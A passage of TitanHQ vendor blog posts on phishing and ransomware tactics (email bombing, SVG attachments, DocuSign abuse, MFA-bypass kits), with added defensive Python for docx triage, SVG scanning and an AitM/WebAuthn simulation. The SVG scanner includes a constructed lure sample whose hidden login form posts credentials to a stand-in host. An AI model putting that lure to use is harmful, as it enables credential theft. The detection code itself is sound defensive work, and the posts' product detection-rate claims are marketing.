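    container no longer parses, while the leading bytes still look like a normal .docx."""
    return data[:-40]


def classify_docx(data: bytes) -> str:
    """valid-ooxml, corrupted-ooxml (zip magic but unparseable or missing core parts),
    or not-ooxml (no zip magic at all, e.g. a legacy binary .doc renamed to .docx)."""
    if not data.startswith(ZIP_MAGIC):
        return "not-ooxml"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            if z.testzip() is not None:           # some member fails its CRC check
                return "corrupted-ooxml"
            names = set(z.namelist())
            if not all(part in names for part in REQUIRED_PARTS):
                return "corrupted-ooxml"
    except zipfile.BadZipFile:
        return "corrupted-ooxml"
    return "valid-ooxml"


def attachment_verdict(filename: str, data: bytes) -> str:
    """Gateway policy: a .docx that cannot be parsed is quarantined for sandbox or manual
    review rather than passed through because no macro or payload was found."""
    if not filename.lower().endswith(".docx"):
        return "scan-normally"
    return "scan-normally" if classify_docx(data) == "valid-ooxml" else "quarantine"


if __name__ == "__main__":
    good = build_sample_docx()
    for name, blob in [("Annual_Bonus.docx", good), ("Annual_Bonus.docx", corrupt_container(good))]:
        print(name, classify_docx(blob), attachment_verdict(name, blob))
```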
It is also easy to add this type of\r\nthreat to the SafeTitan phishing simulator to test how employees respond to this new threat type.\r\nAs the researchers demonstrated, Microsoft fails to detect the threat, demonstrating why it is important to bolster\r\nyour M365 phishing defenses with a third-party solution, such as PhishTitan from TitanHQ. PhishTitan integrates\r\nseamlessly with Microsoft 365 to augment protection and catches the phishing threats that Microsoft misses.\r\nPhishTitan will also add a banner to all inbound emails that come from external sources, giving users a clear flag\r\nthat the message did not originate inside the organization. The HR department and payroll team use internal email\r\naddresses, so a genuine message from them would not carry the external-sender banner.\r\nAn email security solution with email sandboxing is also advisable for deep inspection of file attachments,\r\nincluding the ability to read QR codes. Spam filters for incoming mail should also have machine learning and AI-based detection capabilities for identifying emails that deviate from the messages typically received by the\r\nbusiness.\r\nAll of these features are part of TitanHQ’s email security suite. Give the team a call today to find out more.\r\nEmail Bombing Adopted by Ransomware Groups for Initial Access\r\nby G Hunt | December 12, 2024 | Network Security, Security Awareness\r\nIn this post, we explore some of the tactics used by the Black Basta ransomware group to gain initial access to\r\nvictims’ networks. Black Basta is a ransomware-as-a-service (RaaS) group that first appeared in April 2022. After\r\ngaining access to victims’ networks, the group escalates privileges and moves laterally within the network,\r\nidentifying sensitive data and exfiltrating files before running its encryption processes. 
The group then drops a\r\nransom note and demands payment to prevent the publication of the stolen data and to obtain the keys to\r\ndecrypt the encrypted files. The group targets multiple industry sectors including healthcare organizations,\r\nprimarily in North America, Europe, and Australia.\r\nThe group’s tactics are constantly evolving; however, one of the most common tactics used for initial access is\r\nemail phishing, either by sending an email with a hyperlink to a malicious website or an infected email\r\nattachment. The group’s phishing campaigns aim to deliver Qakbot malware, which is used to provide persistent\r\naccess to victims’ networks (via autorun entries and scheduled tasks), and for running PowerShell scripts to\r\ndisable security solutions. The malware is then used to deliver additional malicious payloads such as Cobalt\r\nStrike, and legitimate software tools such as Splashtop, Mimikatz, and ScreenConnect.\r\nRecently, the group has been observed using a new tactic called email bombing as an alternative way of gaining\r\ninitial access to networks. With email bombing, the selected targets’ email addresses are sent large volumes of\r\nspam emails, often by signing the user up to multiple mailing lists or spamming services simultaneously. After\r\nreceiving a large volume of spam emails, the user is prepared for the next stage of the attack.\r\nThe threat actor reaches out to the user, often via Microsoft Teams or over the phone, and impersonates a member\r\nof the IT help desk. The threat actor claims they have identified a problem with spam email and tells the user that\r\nthey need to download a remote management tool to resolve the issue.\r\nIf the user agrees, they are talked through downloading one of several tools such as QuickAssist, AnyDesk,\r\nTeamViewer, or ScreenConnect. The threat actor then uses that tool to remotely access the user’s device. 
These\r\ntools may be downloaded directly from the legitimate vendor’s domain; however, since many businesses have\r\ncontrols in place to prevent the installation of unauthorized remote access tools, the installation executable file\r\nmay be downloaded from SharePoint. Once installed, the threat actor will use the remote access to deliver a range\r\nof payloads.\r\nEmail bombing is a highly effective tactic as it creates a need to have an issue resolved. Once on the phone or in\r\nconversation via Microsoft Teams, the threat actor is able to try other methods for installing the remote access\r\ntools if they fail due to the user’s security settings.\r\nEmail bombing may be used by multiple threat actors for initial access, and phishing remains the most common\r\nmethod for gaining a foothold in networks for follow-on attacks. Implementing defenses against these tactics will\r\nsignificantly improve your security posture and make it harder for threat actors to breach your network.\r\nAn Advanced Spam Filter\r\nAn advanced spam filter is a must, as it can identify and block phishing attempts and reduce the effectiveness of\r\nemail bombing. Next-gen spam filtering software incorporates AI and machine learning algorithms to thoroughly\r\nassess inbound emails, checking how they deviate from the emails typically received by the business, and helping\r\nto flag anomalies that could indicate novel phishing attempts.\r\nA spam filter should also incorporate email sandboxing in addition to antivirus software protection, as the latter\r\ncan only detect known threats. Novel malware variants and obfuscated malware are often missed by antivirus\r\nsoftware, so a sandbox is key to blocking malware threats. 
After passing initial checks, an email is sent to the\r\nemail sandboxing service for deep analysis, where behavior is checked for malicious actions, such as attempted\r\nC2 communications and malware downloads.\r\nSpamTitan incorporates machine learning algorithms, sandboxing, and link scanning to provide advanced\r\nprotection against phishing and malware attacks. SpamTitan was recently rated the most effective spam filter in\r\nrecent independent tests by VirusBulletin, blocking 100% of phishing emails, 100% of malware, and 99.99% of\r\nspam emails, giving the solution the highest overall score out of all 11 spam filtering services put to the test.\r\nSecurity Awareness Training\r\nIt is important to provide regular security awareness training to the workforce, including all employees and the C-suite. The most effective training is provided regularly in small chunks, building up knowledge of threats and\r\nreinforcing security best practices. This is easiest with a modular computer-based training course. When new\r\ntactics such as email bombing are identified, they can be easily incorporated into the training course and rolled out\r\nto end users to improve awareness of specific tactics. Also consider running phishing simulations, as these have\r\nbeen shown to be highly effective at reinforcing training and identifying knowledge gaps that can be addressed\r\nthrough further training.\r\nTitanHQ makes this as easy as possible with the SafeTitan security awareness training and phishing simulation\r\nplatform. 
The platform includes hundreds of engaging and enjoyable training modules covering all aspects of\r\nsecurity and threats employees need to be aware of, while the phishing simulation platform makes it easy to create\r\nand automate internal phishing simulations, which automatically trigger relevant training content if the user fails\r\nthe simulation.\r\nGive the TitanHQ team a call today for further information on SpamTitan and SafeTitan, for a product\r\ndemonstration, or to arrange a free trial.\r\nProtect Your Business Against Holiday Season Cyber Threats\r\nby G Hunt | November 30, 2024 | Internet Security, Phishing \u0026 Email Spam\r\nHoliday season officially started the day after Thanksgiving in the United States, or Black Friday as it is now\r\nknown. Taking its name from a term used by police officers in Philadelphia to describe the chaos in the city\r\ncaused by the deluge of suburban shoppers heading to the city to do their holiday shopping, it has become a day\r\nwhen retailers offer bargains to entice the public to buy their goods and services. While the jury is still out on how\r\ngood many of those bargains are, the consensus is that there are bargains to be found in stores and online, with the\r\nofficial day for the latter being the Monday after Black Friday – Cyber Monday.\r\nThe holiday season for shoppers is boom time for cybercriminals who take advantage of the increase in online\r\nshoppers looking to buy gifts for Christmas and pick up a bargain or two. Many people time major purchases to\r\ntake advantage of Black Friday and Cyber Monday offers and cybercriminals are poised to pounce on the\r\nunwary. The losses to scams over the holiday period are staggering. 
According to the Federal Bureau of\r\nInvestigation (FBI), more than $73 million was lost to holiday season scams in 2022; however, the true total is\r\nlikely to be considerably higher since many losses go unreported. Those figures do not include the losses to\r\nphishing, malware, ransomware, BEC attacks, and other cyberattacks that occur over the holiday period, such as\r\nthe surge in ransomware attacks over Thanksgiving weekend and Christmas, when IT staff are spread thin.\r\nGiven the heightened risk of scams and cyberattacks over the holiday season, consumers should be on their guard,\r\ntake extra care online, ensure that vendors are legitimate before handing over their card details, and double-check the legitimacy of any email requests. While consumers face elevated risks during the holiday season, so\r\ndo businesses. There are end-of-year deadlines to meet and it’s a short month with many workers taking annual\r\nleave over Christmas and the New Year. As the year draws to a close it is common for vigilance to slip, and threat\r\nactors are ready to take advantage. Businesses need to ensure that their defenses are up to scratch, especially\r\nagainst phishing – the most common initial access vector in cyberattacks – as a slip in vigilance can easily lead to\r\na costly cyberattack.\r\nBusinesses can take several proactive steps to ensure they are protected against holiday season cyber threats, and\r\nconducting a security awareness training session is a good place to start. Employees should be reminded about the\r\nincrease in malicious cyber activity over the holiday period and about the risks they may encounter\r\nonline, via email, SMS, instant messaging services, and the phone. With TitanHQ’s SafeTitan security awareness\r\ntraining platform, it is easy to spin up training courses for employees to remind them to be vigilant and warn them\r\nabout seasonal and other cyber threats. 
The training platform makes it quick and easy to create and automate\r\ntraining courses, with the training delivered in modules of no more than 10 minutes to ensure employees can\r\nmaintain concentration and fit the training into their workflows. The SafeTitan platform also incorporates a\r\nphishing simulator, which businesses can use to reinforce training and identify individuals who are fooled by\r\nphishing scams and ensure they receive the additional training they need.\r\nDue to the high risk of phishing attacks, it is a good idea to implement an advanced spam filter service, one that\r\nreliably identifies and neutralizes phishing and business email compromise attempts and provides cutting-edge\r\nprotection against malware. You need look no further than SpamTitan for that protection. SpamTitan incorporates\r\nmachine learning and AI-based detection capabilities for detecting phishing, BEC, and scam emails, and dual\r\nantivirus engines and email sandboxing for detecting malware threats, including novel malware variants. In Q3,\r\nVirusBulletin’s tests of SpamTitan confirmed a phishing detection rate of 99.99% and a malware catch rate of\r\n99.511%. The interim figures for November 2024 are a 100% phishing catch rate and a 100% malware catch rate,\r\ndemonstrating the reliability of TitanHQ’s cloud-based email filtering solution.\r\nTitanHQ also offers online protection through the WebTitan DNS filter, which prevents access to known malicious\r\nwebsites, blocks malware downloads from the Internet, and can be used to control the web content employees can\r\naccess, providing an important extra layer of security against web-based threats. At TitanHQ we hope you have a\r\nhappy holiday period and above all else that you are well protected against cyber threats. 
Give the team a call\r\ntoday to find out more about how we can help protect your business this holiday season and beyond.\r\nPhishing Campaign Targets Law Firms by Impersonating U.S. Federal Courts\r\nby G Hunt | November 30, 2024 | Phishing \u0026 Email Spam\r\nA phishing campaign has been identified that targets law firms by impersonating U.S. federal courts and purports\r\nto contain an electronic notice of court filings. Like many similar campaigns in recent months, the campaign aims\r\nto trick law firm employees into downloading malware that provides the threat actor with persistent access to the\r\nlaw firm’s network.\r\nThreat actors often target businesses, but a far more effective use of their time and resources is to target vendors. If\r\na threat actor gains access to a vendor’s network, they can potentially use the vendor’s privileged access to attack\r\nall downstream clients. Even when a vendor does not have privileged access to client networks, they are likely to\r\nstore large amounts of data from multiple clients. In the case of law firms, that data is highly sensitive and easily\r\nmonetized. It can be easily sold on darknet marketplaces and be used as leverage to extort the law firm and its\r\nclients.\r\nOver the last few years, law firms have been extensively targeted by threat actors for this very reason. According\r\nto a 2023 report from the UK’s National Cyber Security Centre, 65% of law firms have been a victim of a cyber\r\nincident and a 2024 report from the chartered accountancy firm Lubbock Fine indicates cyberattacks on law firms\r\nhave increased by 77% year-over-year. 
These attacks are mainly motivated by extortion, typically through ransomware.\r\nThere has also been a surge in business email compromise (BEC) attacks on law firms, as they are typically\r\ninvolved in large financial transactions that threat actors can try to divert to their own accounts.\r\nOne of the latest campaigns seeks persistent access to the networks of law firms by tricking the firms into\r\ninstalling malware. The campaign came to light following multiple complaints about fake notices of electronic\r\ncourt filings, which prompted the U.S. federal judiciary to issue a warning to U.S. lawyers to be alert to email\r\nnotifications that purport to be notifications from the courts. The emails impersonate the PACER case\r\nmanagement and electronic case files system, and instruct the recipient to respond immediately. The judiciary\r\nadvised law firms to always check the federal judiciary’s official electronic filing system and never open\r\nattachments in emails or download files from unofficial sources.\r\nThe intercepted emails impersonate lower courts and prompt the recipient to click an embedded hyperlink to\r\naccess a document from a cloud-based repository. Clicking the link directs the user to a malicious website where\r\nthey are prompted to download a file. Opening the file triggers the installation of malware that will give the threat\r\nactor the access they need for an extensive compromise. If successful, the campaign is likely to result in the theft of\r\nsensitive data and attempted extortion.\r\nMost law firms will be well aware that they are prime targets for threat actors and the importance of implementing\r\nrobust cybersecurity defenses. Since phishing is the most common way that threat actors get access to their\r\nnetworks and sensitive data, it is vital for law firms to ensure that they have an effective email security solution –\r\none that is capable of detecting and blocking malware and correctly classifying phishing and BEC emails. 
This is\r\nan area where TitanHQ can help. TitanHQ offers a suite of cutting-edge cybersecurity solutions that provide\r\nmultiple layers of protection against the most common attack vectors.\r\nThe primary defense against phishing and BEC attacks is anti-spam software, which TitanHQ can provide as a\r\ncloud-based anti-spam service or virtual anti-spam appliance that can be installed on-premises on existing\r\nhardware. The SpamTitan solution incorporates dual anti-virus engines and email sandboxing for detecting\r\nmalware and malicious code in email attachments, even zero-day malware threats. The solution has machine\r\nlearning capabilities for detecting novel email threats such as phishing and BEC attacks that are needed to detect\r\nand block the latest AI-generated threats. In independent tests by Virus Bulletin in November 2024 on 125,000\r\nemails, SpamTitan had a 100% malware and phishing catch rate and only miscategorized 2 benign spam emails.\r\nIt is also important to ensure that all lawyers and support staff are made aware of the latest threats and receive\r\nregular cybersecurity awareness training. TitanHQ offers a comprehensive security awareness training platform\r\n(SafeTitan) and phishing simulator that makes it easy to create effective, ongoing training programs that\r\nincorporate training material on the latest threats. Give the TitanHQ team a call today for more information on\r\nthese and other cybersecurity solutions and for advice on improving your cybersecurity defenses against the most\r\ncommon attack vectors.\r\nSVG Image Files Being Used for Phishing and Malware Delivery\r\nby G Hunt | November 29, 2024 | Phishing \u0026 Email Spam\r\nCybercriminals are increasingly leveraging SVG files in their email campaigns. 
These file attachments have been\r\nused as part of convincing campaigns that have fooled many end users into disclosing their credentials or\r\ninstalling malware.\r\nSVG files, or Scalable Vector Graphics files to give them their full name, differ from standard image files such as\r\nBMP, JPG, and PNG files. Vector graphics are constructed from mathematical descriptions of shapes (paths,\r\ncurves, and points) rather than a grid of colored blocks (pixels). The advantage of vector graphics files is that they can be scaled\r\ninfinitely with no loss of resolution, something that cannot be done with pixel-based images. Vector files are often\r\nused for logos, as they can be scaled up easily to be used in billboards with no loss of resolution, and they are\r\nincreasingly being used on the web as the images will display correctly regardless of the size of the browser\r\nwindow or screen.\r\nSVG is an incredibly versatile file format that can incorporate elements other than the image itself. An SVG file\r\nis XML, and it can embed HTML (via the foreignObject element) and JavaScript (via script elements and event\r\nattributes such as onload). It is therefore possible to create an SVG image file that incorporates HTML and\r\nexecutes JavaScript on loading, redirecting users to a malicious website such as a phishing landing page. The\r\nscript runs when the SVG is opened as a document in a browser, which is what happens when a recipient double-clicks the attachment on many systems; it does not run when the same file is merely displayed through an\r\nimg tag in a web page or email body. Images\r\ncan be created that incorporate clickable download buttons, which will download payloads from a remote URL.\r\nAn end user could easily be tricked into downloading a file with a double extension that appears to be a PDF file\r\nbut is actually a malware executable.\r\nSome of the recently intercepted phishing emails have included an SVG file that displays an image of an Excel\r\nspreadsheet. Since the spreadsheet is an image, the user cannot interact with it, but it includes an embedded form\r\nthat mimics the Microsoft 365 login prompt. If the user enters their credentials into that form, they are transmitted\r\nto the threat actor. 
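The following scanner is an added example, not code from the original post or from TitanHQ: it parses an SVG attachment and flags the active-content features described above (inline script elements, on* event handlers, HTML embedded through foreignObject, javascript: links) so a mail gateway or triage script can quarantine the file before a user opens it in a browser. Both sample SVGs and the host names inside them are constructed for illustration. The lure sample mirrors the spreadsheet-with-login-form attachment the post describes.

```python
"""Static triage of SVG attachments for active content.

Added example, not code from the original post. It flags the SVG features the
post describes (inline script, event-handler attributes, embedded HTML via
foreignObject, javascript: links) so a gateway or triage script can quarantine
the file. Both sample files are constructed; the host names are made up.
"""
import re
import xml.etree.ElementTree as ET

# HTML elements that have no business inside an image file.
HTML_IN_SVG = {"form", "input", "iframe", "embed", "object", "button"}


def _local(name: str) -> str:
    """Drop the XML namespace from an element or attribute name."""
    return name.rsplit("}", 1)[-1].lower()


def scan_svg(data: bytes) -> list[str]:
    """Return findings; an empty list means no active content was seen."""
    findings = []
    if re.search(rb"<!ENTITY", data, re.I):
        findings.append("DTD entity declaration (XXE or obfuscation)")
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # Malformed XML is itself suspicious for a file claiming to be an image.
        return findings + [f"unparseable SVG ({exc})"]
    for el in root.iter():
        tag = _local(el.tag)
        if tag == "script":
            findings.append("inline <script> element")
        elif tag == "foreignobject":
            findings.append("<foreignObject> (embedded HTML, e.g. a login form)")
        elif tag in HTML_IN_SVG:
            findings.append(f"HTML <{tag}> element inside SVG")
        for name, value in el.attrib.items():
            attr, v = _local(name), value.strip().lower()
            if attr.startswith("on"):
                findings.append(f"event handler {attr} on <{tag}>")
            elif attr == "href" and v.startswith(("javascript:", "data:text/html")):
                findings.append(f"{v.split(':', 1)[0]}: URL on <{tag}>")
            elif attr == "href" and v.startswith(("http://", "https://")):
                findings.append(f"external link {value} on <{tag}>")
    return findings


def verdict(data: bytes) -> str:
    """Gateway decision: any finding is enough to quarantine an image attachment."""
    return "quarantine" if scan_svg(data) else "allow"


# Constructed benign logo: shapes only, no script, no links.
BENIGN_LOGO = b"""<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 64 64">
  <circle cx="32" cy="32" r="28" fill="#1a73e8"/>
</svg>"""

# Constructed lure in the shape the post describes: a picture of a spreadsheet
# with an HTML credential form on top and a redirect when the file loads.
SPREADSHEET_LURE = b"""<svg xmlns="http://www.w3.org/2000/svg"
     xmlns:xlink="http://www.w3.org/1999/xlink" width="800" height="600"
     onload="window.location='https://m365-verify.example.invalid/'">
  <image xlink:href="data:image/png;base64,iVBORw0KGgo=" width="800" height="600"/>
  <foreignObject x="200" y="150" width="400" height="260">
    <form xmlns="http://www.w3.org/1999/xhtml" method="post"
          action="https://m365-verify.example.invalid/collect">
      <input name="login"/><input name="passwd" type="password"/>
      <button>Sign in</button>
    </form>
  </foreignObject>
</svg>"""

if __name__ == "__main__":
    for label, sample in (("logo", BENIGN_LOGO), ("lure", SPREADSHEET_LURE)):
        print(label, verdict(sample), scan_svg(sample))
```

The checks are deliberately structural rather than signature-based: the lure above carries no known-bad URL and no obfuscated payload, yet it is still quarantined because an image has no legitimate reason to contain a form or an onload handler. A gateway that only blocks by extension can use the same function to carve out an exception for design teams: allow SVG only when scan_svg returns nothing.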
One problem with this file format is that it is not generally blocked by anti-spam\r\nsoftware, so such attachments are likely to be delivered to inboxes.\r\nWhile SVG and other vector graphics file formats are invaluable for design and can be found extensively on the\r\nweb, they are not generally used for image sharing, so the easiest way to protect against these malicious\r\ncampaigns is to configure your spam filtering service to block or quarantine emails containing SVG file\r\nattachments, at least for employees who do not usually work with these file formats. If you have a cloud-based\r\nanti-spam service that incorporates email sandboxing, where attachments are sent for deep analysis, it is possible\r\nto detect SVG files that incorporate malicious JavaScript. Since the use of these file formats is increasing, it is\r\nimportant to make your employees aware of the threat through security awareness training. Emails with SVG file\r\nattachments should also be incorporated into your phishing simulations to determine whether employees open\r\nthese files. Both are easy with the SafeTitan security awareness training and phishing simulation platform.\r\nDocuSign Abused in Massive Phishing Campaign\r\nby G Hunt | November 28, 2024 | Phishing \u0026 Email Spam\r\nA large-scale phishing campaign has been identified that abuses the e-signature software DocuSign, a hugely\r\npopular software solution used to legally and securely sign digital documents and eliminate the time-consuming\r\nprocess of manually signing documents.\r\nDocuSign uses “envelopes” to send documents to individuals for signing. These document containers may contain\r\none or more documents that need to be signed, and the envelopes are sent via email. 
In this campaign, a bad actor\r\nabuses the DocuSign Envelopes API to create fake invoices, which are mass-distributed via email. The campaign\r\naims to get the recipient to sign the invoice using DocuSign. The signed document is then used for the next phase\r\nof the scam, which typically involves sending it to the billing department for payment, with or without DocuSign\r\nbeing involved in that step. The invoices generated for this campaign are based on\r\nlegitimate DocuSign templates and are generated through a legitimate DocuSign account. The invoices include\r\nlegitimate branding for DocuSign and the company/product the threat actor is impersonating – such as Norton\r\nInternet Security, PayPal, and other big-name brands.\r\nThe problem for businesses with this campaign is the emails are sent from the genuine docusign[.]net domain,\r\nwhich means email security solutions are unlikely to block the messages since the domain is trusted. Because the\r\nmessages genuinely originate from DocuSign’s infrastructure, they pass SPF, DKIM, and DMARC checks; email\r\nauthentication confirms who sent a message, not whether its content is legitimate. Since the\r\nemails appear to be legitimate invoices with genuine branding and the correct invoice amount for the product\r\nbeing spoofed, end users are likely to be tricked by the emails. The tactics used in this campaign are similar to\r\nothers that have abused legitimate cloud-based services to bypass email security solutions, such as sending\r\nmalicious URLs in documents hosted on Google Docs and Microsoft SharePoint.\r\nThe primary defense against these campaigns is security awareness training. Businesses need to make their\r\nemployees aware of campaigns such as these, which often bypass email security solutions and are likely\r\nto land in inboxes since they may not contain any malicious URLs or malware code and are sent from a legitimate,\r\ntrusted domain. The workforce needs to be trained on cybersecurity best practices and told about the red flags in\r\nemails that are indicative of a scam. 
Training needs to be provided continuously to make employees aware of the\r\nlatest scams, as bad actors are constantly refining their tactics, techniques, and procedures, and developing new\r\nways to trick end users. The easiest way to do this is with a comprehensive security awareness training solution\r\nsuch as SafeTitan.\r\nSafeTitan makes it easy to create training programs for different roles in the organization and automate these\r\ntraining programs to ensure training content is delivered in manageable chunks, with new content added and rolled\r\nout in response to the latest threats. These training programs should be augmented with phishing simulations. An\r\nemail security solution with AI and machine-learning capabilities is also important, as standard spam software is\r\nnot effective at identifying threats from legitimate and trusted cloud services. TitanHQ’s PhishTitan solution for\r\nMicrosoft 365 has these capabilities and identifies the phishing emails that Microsoft often misses. PhishTitan\r\nscans inbound messages for malicious content, uses email sandboxing for detecting zero-day threats, adds banners\r\nto emails from external sources, and allows security teams to rapidly remediate identified threats throughout the\r\nentire email environment. In November 2024, Virus Bulletin assessed the engine that powers the SpamTitan spam\r\nfiltering service and PhishTitan anti-phishing solution using around 125,000 emails. 
SpamTitan and PhishTitan\r\nblocked 100% of malware and 100% of phishing emails and only miscategorized 2 benign spam emails,\r\ndemonstrating how effective these solutions are at blocking malicious emails.\r\nFor more information on improving your defenses against malicious email campaigns through cutting-edge email\r\nsecurity and security awareness training, give the TitanHQ team a call today.\r\nMultifactor Authentication Can Give a False Sense of Security\r\nby G Hunt | November 26, 2024 | Phishing \u0026 Email Spam, Spam Software\r\nIt is all too easy to place too much reliance on multifactor authentication (MFA) to protect against phishing\r\nattacks. In theory, if an employee is duped by a phishing email and their credentials are stolen, MFA should stop\r\nthe threat actor from using those credentials to access the account, as they will not have the necessary additional\r\nauthentication factor(s). The reality is somewhat different. While MFA can – and does – block many attacks where\r\ncredentials have been obtained, it is far from infallible. MFA has made it much harder to compromise accounts\r\nbut, in response, threat actors have developed new tactics to bypass MFA protections.\r\nFor example, there is a scam where an employee is contacted by an individual who claims to be from their IT\r\ndepartment. The scammer tells them there is an issue with their account and they need to update their password.\r\nThey are directed to a site where they are prompted to enter their password and enter the MFA code sent to their\r\nphone. The threat actor uses that information in real-time to access their account. Multiple campaigns have\r\ntargeted IT helpdesk staff, with the threat actor impersonating an employee. 
They provide information to verify\r\ntheir identity (obtained in an earlier phase of the campaign) and ask to register a new device to receive their MFA\r\ncodes.\r\nPhishing-as-a-service (PhaaS) toolkits capable of defeating MFA are advertised for purchase or rental on hacking\r\nforums and Telegram channels. They involve an adversary-in-the-middle (AitM) attack and use a\r\nreverse proxy between the victim and the legitimate portal for the credentials being sought. The user is directed to\r\na login page that appears exactly as expected, because the proxy relays the genuine site’s pages and the user is\r\nreally logging into the genuine site. What is unknown to the\r\nuser is that the attacker sits between them and the site and captures the credentials and the session cookie after MFA is\r\nsuccessfully navigated. The attacker then has access to the account for the duration of the session cookie and can\r\nregister a new device to receive future codes.\r\nPhaaS kits are a serious threat and are proving popular with cybercriminals. Take the Rockstar 2FA kit for\r\nexample, which is advertised for $200 for a 2-week subscription. The kit includes everything a phisher needs,\r\nincluding MFA bypass, login pages for targeting specific credentials, session cookie harvesting, fully undetectable\r\n(FUD) malicious links and link redirectors, a host of phishing templates, and an easy-to-use admin panel that\r\nallows tracking of phishing campaigns. The phishing URLs available are also hosted on legitimate services such\r\nas Google Docs Viewer, Microsoft OneDrive, and LiveAgent – sites commonly trusted by email security\r\nsolutions. This is just one phishing kit. There are many being offered with similar capabilities.\r\nThe take-home message is that MFA, while important, can be bypassed. For maximum protection, phishing-resistant multifactor authentication should be used – e.g. 
smartcards or FIDO security keys. These MFA tools can\r\nbe expensive to implement, so at the very least ensure that you have some form of MFA implemented and\r\nimplement several other layers of defenses. An advanced spam filtering service such as SpamTitan is essential, as\r\nit can block phishing emails to ensure they do not reach end users. Review sites often rate SpamTitan as one of the\r\nbest spam filters for business due to how easy the solution is to use and its excellent detection rate. In November\r\n2024, in tests by Virus Bulletin, SpamTitan blocked 100% of malware and 100% of phishing emails out of a test\r\ninvolving around 125,000 messages. Previous assessments had a catch rate of more than 99.99%, demonstrating\r\nthe reliability and accuracy of the solution.\r\nAnother layer of protection can be provided by a web filter, which will block attempts to visit known malicious\r\nwebsites, such as those used for phishing and malware distribution. WebTitan provides time-of-click protection, as\r\ndoes TitanHQ’s PhishTitan product – an anti-phishing solution specifically developed to protect M365 accounts\r\nagainst phishing by augmenting Microsoft’s controls to catch the phishing emails that EOP and Defender miss.\r\nTechnical defenses are important, but so too is workforce training. Through regular security awareness training\r\nand phishing simulations, employees can be taught cybersecurity best practices and how to identify and avoid\r\nscam emails. If you want to improve your defenses against phishing and malware, give the TitanHQ team a call\r\nand have a chat about your options. 
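The reason smart cards and FIDO security keys resist the AitM proxy described above is origin binding, and the simulation below is an added example (not part of the original post) that makes the difference concrete. It replays the relay attack against two second factors: a TOTP code, which the proxy simply forwards and the portal accepts, and a WebAuthn-style assertion, which the browser signs over the origin it is actually talking to, so the portal rejects it whether the proxy forwards that origin honestly or rewrites it. The host names are made up, and the authenticator's signature is modelled with HMAC over a per-credential secret as a stand-in for the asymmetric signature a real FIDO2 key produces; the origin check is the same in both.

```python
"""Why phishing-resistant MFA survives an adversary-in-the-middle (AitM) proxy.

Added example; not part of the original post. Host names are made up. The
authenticator signature is HMAC over a per-credential secret, a stand-in for
the asymmetric signature real FIDO2 keys produce; origin binding is identical.
"""
import hashlib
import hmac
import secrets
import struct

REAL_ORIGIN = "https://login.example-corp.invalid"       # assumed genuine portal
PHISH_ORIGIN = "https://login.example-corp-sso.invalid"  # assumed AitM proxy


def totp(secret: bytes, unix_time: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP (HMAC-SHA1), as the victim's authenticator app computes it."""
    counter = struct.pack(">Q", unix_time // step)
    mac = hmac.new(secret, counter, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % 10 ** digits).zfill(digits)


class RelyingParty:
    """The genuine portal, holding what it learned at enrolment (constructed)."""

    def __init__(self) -> None:
        self.totp_seed = b"12345678901234567890"          # RFC 6238 test seed
        self.cred_key = b"credential-key-registered-by-the-user"
        self.expected_origin = REAL_ORIGIN

    def new_challenge(self) -> bytes:
        return secrets.token_bytes(32)

    def verify_totp(self, code: str, unix_time: int) -> bool:
        return hmac.compare_digest(code, totp(self.totp_seed, unix_time))

    def verify_assertion(self, challenge: bytes, claimed_origin: str, sig: bytes) -> bool:
        """Accept only if sig covers (challenge, claimed_origin) AND the
        claimed origin is the portal's own."""
        expected = hmac.new(self.cred_key, challenge + claimed_origin.encode(),
                            hashlib.sha256).digest()
        return hmac.compare_digest(sig, expected) and claimed_origin == self.expected_origin


class Authenticator:
    """Security key or platform authenticator bound to one credential."""

    def __init__(self, cred_key: bytes) -> None:
        self.cred_key = cred_key

    def sign(self, challenge: bytes, browser_origin: str) -> bytes:
        # The browser, not the web page, supplies the origin; the key signs it
        # together with the challenge and cannot be asked to sign another.
        return hmac.new(self.cred_key, challenge + browser_origin.encode(),
                        hashlib.sha256).digest()


def aitm_relays_totp(rp: RelyingParty, unix_time: int) -> bool:
    """Victim types the current code into the proxy page; the proxy forwards it."""
    code_typed_into_proxy = totp(rp.totp_seed, unix_time)
    return rp.verify_totp(code_typed_into_proxy, unix_time)   # True: MFA bypassed


def aitm_relays_webauthn(rp: RelyingParty, proxy_rewrites_origin: bool) -> bool:
    """Proxy forwards the real challenge; the victim's browser is on PHISH_ORIGIN."""
    challenge = rp.new_challenge()
    sig = Authenticator(rp.cred_key).sign(challenge, PHISH_ORIGIN)
    claimed = REAL_ORIGIN if proxy_rewrites_origin else PHISH_ORIGIN
    return rp.verify_assertion(challenge, claimed, sig)       # False either way


def legitimate_webauthn(rp: RelyingParty) -> bool:
    challenge = rp.new_challenge()
    sig = Authenticator(rp.cred_key).sign(challenge, REAL_ORIGIN)
    return rp.verify_assertion(challenge, REAL_ORIGIN, sig)   # True


if __name__ == "__main__":
    portal = RelyingParty()
    print("TOTP relayed through proxy accepted:", aitm_relays_totp(portal, 59))
    print("WebAuthn relayed (honest origin) accepted:", aitm_relays_webauthn(portal, False))
    print("WebAuthn relayed (origin rewritten) accepted:", aitm_relays_webauthn(portal, True))
    print("WebAuthn from the real site accepted:", legitimate_webauthn(portal))
```

The TOTP path fails because the code carries no information about where it was typed, so nothing distinguishes the proxy from the user. In the WebAuthn path the proxy is stuck: forwarding the assertion as-is reveals the phishing origin, and rewriting the origin breaks the signature. The same logic is why session-cookie theft after a successful FIDO login remains a risk: origin binding protects the authentication, not the session that follows, which is the reason the post's other layers still matter.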
